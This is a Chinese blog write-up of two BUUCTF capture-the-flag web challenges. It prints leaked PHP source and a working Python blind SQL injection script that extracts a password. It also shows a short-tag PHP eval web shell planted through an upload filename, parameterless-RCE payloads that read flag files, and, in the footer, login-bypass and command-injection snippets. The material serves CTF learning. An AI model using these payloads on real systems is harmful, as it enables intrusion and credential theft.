[CISCN2019 总决赛 Day2 Web1]Easyweb && [GXYCTF2019]禁止套娃

最新推荐文章于 2024-05-08 17:21:13 发布
最新推荐文章于 2024-05-08 17:21:13 发布
阅读量1.3k 收藏
点赞数 7
分类专栏: BUUCTF web CTF知识点总结 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/crisprx/article/details/104924792
版权

[CISCN2019 总决赛 Day2 Web1]Easyweb

0X01 前言

现在开始记录BUUCTF上的web了,每周认真刷一些题,了解一些知识点和套路,不要让自己这么菜。。

0X02 正文

发现是一个登录界面,先从登录框fuzz一下,看能否万能密码通过,无果。
一般直接是登录框,肯定隐藏这其他目录或者是源码泄露,所以开始扫目录
dirsearch -u "http://1606db13-c732-47b1-8026-e57a5eeee572.node3.buuoj.cn/" -e u啥也没扫到,原来是请求频繁了,没得办法,只能burpsuite线程变小时间延迟变高,再来扫一遍目录,发现了robots.txt
在这里插入图片描述
F12查看发现有image.php,其实这里很奇怪,一个照片单独用php来显示出来,并且还有id=4,所以我们这里看一下image.php.bak,发现源码泄露,这里贴一下源码:

<?php
include "config.php";

$id=isset($_GET["id"])?$_GET["id"]:"1";
$path=isset($_GET["path"])?$_GET["path"]:"";

$id=addslashes($id);
$path=addslashes($path);

$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);

$result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'");
$row=mysqli_fetch_array($result,MYSQLI_ASSOC);

$path="./" . $row["path"];
header("Content-Type: image/jpeg");
readfile($path);

这里代码比较短,我们仔细审计一下:

这里将idpath都做了addslashes处理:
在这里插入图片描述
idpath转义,我们接着分析:

$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);

idpath存在数组中的字符串给清空,在来看核心代码:

$result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'");

这个时候其实是没有任何过滤的,试想这是我们id=\0,则在addslashes后变为id=\\0,随后将\0其清空,那么这是id=\,正好可以使单引号逃逸出来,变成:

$result=mysqli_query($con,"select * from images where id=' \' or path='   {$path}'");

可以看到现在id的值为\' or path=,所以path就可以进行盲注了。贴下盲注脚本:

import requests

url = "http://1606db13-c732-47b1-8026-e57a5eeee572.node3.buuoj.cn/image.php"
result = ''

for x in range(0, 100):
    high = 127
    low = 32
    mid = (low + high) // 2
    while high > low:
        #payload = " or id=if(ascii(substr((database()),%d,1))>%d,1,0)#" % (x, mid)
        #payload = " or id=if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),%d,1))>%d,1,0)#" % (x, mid)
        #users
        #payload = " or id=if(ascii(substr((select column_name from information_schema.columns where table_name=0x7573657273 limit 1,1),%d,1))>%d,1,0)#" % (x, mid)
        #password
        payload = " or id=if(ascii(substr((select password from users limit 0,1),%d,1))>%d,1,0)#" % (x, mid)
        params = {
            'id':'\\0',
            'path':payload
        }
        response = requests.get(url, params=params)
        if b'JFIF' in response.content:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2

    result += chr(int(mid))
    print(result)

得到了password,直接登录后发现是一个上传页面:
在这里插入图片描述
先传个一句话gif探探路子:
在这里插入图片描述
发现貌似像一个PHP日志文件,路径也给出来了,先去看看。
在这里插入图片描述
这里是PHP文件,而且直接把我们的filename挂到php内容里了,前几天正好看到一个传一句话直接到日志文件,那我们这里也尝试一下,将filename改成<?php eval($_POST['cmd']);?>:
在这里插入图片描述
发现过滤了PHP,我们知道在php的配置文件(php.ini)中有一个short_open_tag的值,开启以后可以使用PHP的短标签:<?= ?>相当于<?php echo >,这个时候把短标签试试,<?= eval($_POST['cmd']);?>,成功执行:
在这里插入图片描述
接下里直接蚁剑连接即可,flag在根目录下。

[GXYCTF2019]禁止套娃

又是啥也没有系列,看看HTTP头,啥也没有,直接开扫,发现git文件泄露githack把源码扒下来:

<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

我们来看一下这个正则,(?R)是引用当前表达式,而(?R)?可以引用也可以不引用了,引用一次正则则变成了[a-z,_]+\([a-z,_]+\((?R)?\)\),可以迭代下去,那么它所匹配的就是print(echo(1))a(b(c()));类似这种可以括号和字符组成的,这其实是无参数RCE比较典型的例子,get也过滤了,这里可能就要比较骚的姿势了。

我们先要看一下本目录的文件,scandir('.');,但是如何得到这个.呢?搜索资料后发现localeconv()函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是.
在这里插入图片描述
current()返回数组中的当前单元, 默认取第一个值。这里我们就能够得到当前目录了在这里插入图片描述
发现就flag.php就在当前目录,如何得到倒数第二个文件,这里得去翻文档了。
array_reverse() 以相反的元素顺序返回数组
array_flip() 交换数组的键和值
array_rand() 从数组中随机取出一个或多个单元,不断刷新访问就会不断随机返回

<?php
$arr1 = array('a','b','c','d','e');
print_r(array_rand(array_flip($arr1)));
?>

这样会在数组中随机得到数组的值,这里禁了get_file_contents,我们可以使用readfile或者highlight_file()来读取,构造payload:
?exp=readfile(array_rand(array_flip(scandir(current(localeconv())))));在这里插入图片描述
可能这里看着有点绕,可以使用session_id()来进行任意文件读取,如何利用?
在这里插入图片描述
session_id可以获取PHPSESSID的值,而我们知道PHPSESSID允许字母和数字出现,而flag.php符合条件.
因此我们在请求包中cookie:PHPSESSID=flag.php,使用session之前需要通过session_start()告诉PHP使用session,php默认是不主动使用session的。
session_id()可以获取到当前的session id。
这样可以构造payload:?exp=readfile(session_id(session_start()));
达到任意文件读取的效果:
在这里插入图片描述

Crispr-bupt
关注
  • 7
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
RedHat7.5修改Yum源为CentOS
博客&brz
01-14 772
1.卸载rhel自带Yum包 #rpm-qa|grepyum # 查看原来的yum源 # rpm -qa|grep yum|xargs rpm -e --nodeps # 强制卸载 # rpm-qa|grepyum # 再次查看,确认已经卸载完成 2.下载Yum包 # mkdir /tmp/pkg &&a...
港台术语与内地术语之对照
热门推荐
狼在江湖飘,尽量少挨刀!
06-27 21万+
在使用计算机的过程中,你可能会碰到各种各样的专业术语,特别是那些英文缩写常让我们不知所云,下面收集了各方面的词组,希望对大家有帮助。&|©雷傲极酷超级论坛 -- 雷傲极酷超级论坛,最新软件,BT 下载,游戏娱乐,交友聊天,您网上的自由天堂  X~ijb   一、港台术语与内地术语之对照efry;R   由于港台的计算机发展相对快一些,许多人都去香港或台湾寻找资料,但是港台使用的电脑专业术语与内地不
django 用户登录
征途人生&梦
03-10 992
django已经做好用户登录及权限相关的功能,我们只需要使用就可以了。 login页面 <form action="/backend/login-in" method="post"> {% csrf_token %} <div class="input-group mb-3"> <input type="tex...
## [GXYCTF2019]禁止套娃### 1
最新发布
sulide_moon的博客
05-08 1510
方法二 上面 的正则过滤中 其实并没有过滤掉 session_id() 所以我们可以使用 session_id来获取 flag session_id() 可以用来获取/设置 当前会话 ID。session_id(session_start()) 使用session之前需要通过session_start()告诉PHP使用session,php默认是不主动使用session的。session_id()可以获取到当前的session id。die("还差一点哦!die("还想读flag,臭弟弟!
What Is New About NewSQL(NewSQL的独到之处)?
数据库生态圈(RDB & NoSQL & Bigdata)——专注于关系库优化(Oracle&Mysql&PG&SQL Server )
05-09 1321
文本源自:https://softwareengineeringdaily.com/2019/02/24/what-is-new-about-newsql/ https://cloud.tencent.com/developer/article/1445846 ByGokhan Simsek ArticleSunday, February 24 2019 Most programmers are familiar with SQL and the...
BUUCTF刷题记录(3)
bmth666的博客
03-20 3301
web [SWPU2019]Web1 [ASIS 2019]Unicorn shop [ACTF2020 新生赛]Include [安洵杯 2019]easy_web [WesternCTF2018]shrine [ACTF2020 新生赛]Exec [GXYCTF2019]禁止套娃 方法一:array_flip()和array_rand() 方法二:array_reverse() 方法三:使用session [GXYCTF2019]BabySQli [CISCN 2019 初赛]Love Math
CMS程序EasyWeb 1.5 UTF-8-web1.5.zip
03-09
2. **多语言支持**:由于采用UTF-8编码,EasyWeb 1.5能够处理多种语言,适合全球化网站。 3. **SEO优化**:提供元标签编辑和友好的URL结构,有利于搜索引擎抓取和排名。 4. **用户管理**:允许创建不同角色的用户...
迷你最小的web服务器easyweb
03-05
迷你最小的Web服务器EasyWeb是一款轻量级的网络应用程序,专为快速搭建本地Web环境而设计。它以其小巧的体积和简易的操作性受到许多初学者和开发者们的喜爱。这款服务器无需复杂的安装过程,只需解压即可运行,非常...
layui easyweb iframe v3.1.8源码
12-08
[增加] 增加fixed方式的select,可用在表格、滚动弹窗中 [增加] 增加动态模板功能 [增加] 主页工作台、控制台的内容进行了补充完善 ...[增加] loading风格增加了一个layui简约样式 ...[优化] 切换tab自动刷新支持每个子...
EasyWeb:EasyWeb是一种快速的Web浏览器-开源
04-24
EasyWeb是使用您的默认Web浏览器的真正快速浏览器。 包括基本功能。
GXYCTF2019 复现
weixin_44377940的博客
03-19 631
GXYCTF复现pingpingping禁止套娃 pingpingping 打开页面: 显然是命令执行。GET传入ip=127.0.0.1 | ls 尝试用cat读取,发现过滤了空格,可以利用$IFS$9、$IFS来绕过,(${IFS}不行,花括号被过滤了),读取flag文件,发现对flag也进行了过滤,尝试用*绕过,发现也过滤了,读取一下index.php,代码如下: <?php if...
qq,微信内置浏览器
11-12
qq , 微信 内置浏览器,官方封装的sdk , 只需要简单的一个jar,调用就可以实现. 使用地址:http://blog.csdn.net/lablenet/article/details/49793747
Oracle DG Broker 进行 SwitchOver & Failover,Failover后恢复主从同步
Hehuyi_In的博客
04-01 3288
前一篇 https://blog.csdn.net/Hehuyi_In/article/details/94384431介绍了SwitchOver & Failover的概念、区别及利用sql操作的方法。可以看到利用sql来执行需要在主从库均进行操作,命令也多,较为复杂,本篇来看如何利用DG Broker来简化这些操作。 一、DG Broker安装与配置 1.DG Brok...
【JavaWeb开发】Referer防盗链的详解
此成非彼诚博客
04-10 4857
本文将由what、why、how来讲解Referer,并有具体实例,如有错误,欢迎指正
一无所知学编程:垃圾回收&过程序编程
weixin_45981643的博客
05-05 751
在计算机科学中,垃圾回收(英语:Garbage Collection,缩写为GC)是一种自动的内存管理机制。当一个电脑上的动态内存不再需要时,就应该予以释放,以让出内存,这种内存资源管理,称为垃圾回收(garbage collection)。垃圾回收器可以让程序员减轻许多负担,也减少程序员犯错的机会。垃圾回收最早起源于LISP语言。目前许多语言如Smalltalk、Java、C#和D语言都支持垃圾...
YOLOv4 (一)编译&运行实例
IceLimbo2019的博客
04-26 4786
YOLOv4 (一)编译&运行实例YOLOv4环境要求编译过程运行实例(检测图片)预告 YOLOv4 YOLO v4 真的来了,从论文上看,使用了很多trick使性能和精度都得到了提升,所以赶紧动手试试。 YOLO v4 论文:https://arxiv.org/abs/2004.10934 YOLO v4 开源代码:https://github.com/AlexeyAB/darknet ...
[python 学习笔记] openpyxl -- excel样式设置 & 冻结窗格
GYK0812的博客
02-20 4086
1. 设置填充颜色, 字体, 边框 from openpyxl import load_workbook from openpyxl.styles import PatternFill, Border, Side, Alignment, Protection, Font wb = load_workbook(file_path) ws = wb['sheet_name'] # 设置...
BUUCTF-WEB菜菜的刷题之路
Pr0m1se1n的博客
07-30 730
BUUCTF平台太棒了,很值得学习鸭!!! 一. GXYCTF 禁止套娃 溜达了一圈,没什么发现。 尝试用dirmap扫目录,发现存在 /.git 浏览器直接访问出现会403 禁止访问。考虑是git源码泄露(常见的源码泄露有.git和.svn) 使用GitHack下载成功 ./index.php 以下是源码: <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_mat
Elasticsearch 中文分词&多词搜索&权重
a80C51的博客
02-12 7821
目录 中文分词器 一、安装中文分词器ik 二、使用中文分词器 多词搜索 权重 中文分词器 一、安装中文分词器ik 源码地址:https://github.com/medcl/elasticsearch-analysis-ik 根据提示,进行安装。 也可以将压缩包,下载到 elasticsearch/plugin文件夹下,然后解压, 重启ES,即完成相关中文分词器的安装。...
[ciscn2019 总决赛 day2 web1]easyweb
03-16
很高兴为您提供答案。 ciscn2019 总决赛 day2 web1 easyweb 是一道Web安全题目,需要使用SQL注入技术来解决。 首先,我们需要在登录页面中输入用户名和密码。然后,我们可以通过在用户名和密码字段中输入一些SQL注入语句来尝试绕过验证。 例如,我们可以在用户名字段中输入: admin' or 1=1# 这将导致SQL查询返回所有用户的信息,因为1=1始终为真。 然后,我们可以在密码字段中输入任何值,因为它不会被使用。 这样,我们就可以成功登录并获得flag。 希望这可以帮助您解决这道题目。如果您有任何其他问题,请随时问我。
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值